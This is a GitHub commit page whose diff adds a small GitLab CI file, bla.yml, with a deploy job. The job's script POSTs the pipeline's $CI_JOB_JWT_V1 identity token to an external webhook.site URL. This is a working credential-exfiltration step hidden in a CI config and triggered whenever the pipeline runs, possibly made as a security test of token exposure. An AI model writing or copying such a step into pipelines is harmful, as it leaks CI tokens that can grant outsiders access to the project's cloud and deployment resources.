Skip to content

Commit

Permalink
.
Browse files Browse the repository at this point in the history
  • Loading branch information
pazbechor committed Jan 8, 2023
1 parent 75554fa commit 4bcb2d6
Showing 1 changed file with 7 additions and 0 deletions.
7 changes: 7 additions & 0 deletions gitlabci/bla.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
default:
image:
name: redis:latest
entrypoint: ["/bin/bash"]

deploy:
script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'

0 comments on commit 4bcb2d6

Please sign in to comment.